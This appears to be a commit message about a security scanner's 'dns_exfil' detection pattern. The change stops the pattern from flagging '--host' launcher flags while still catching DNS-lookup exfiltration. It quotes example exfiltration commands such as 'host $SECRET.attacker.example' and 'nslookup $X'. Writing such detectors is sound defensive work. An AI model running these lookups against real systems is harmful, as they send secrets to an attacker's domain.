13f4cfebfa
The dns_exfil pattern matched the 'host' DNS command inside flag names like llama.cpp/vllm's --host 127.0.0.1 --port $PORT, so any plugin shipping a .sh launcher script was blocked as dangerous. A negative lookbehind (?<![-/]) excludes flag/path contexts while real DNS-lookup exfiltration (host $SECRET.attacker.example, nslookup $X, dig $(...)) still trips the pattern. Salvaged from PR #92382 (regex fix + regression test); scan-scoping half rejected separately.
2 lines
11 B
Plaintext
2 lines
11 B
Plaintext
SouthpawIN
|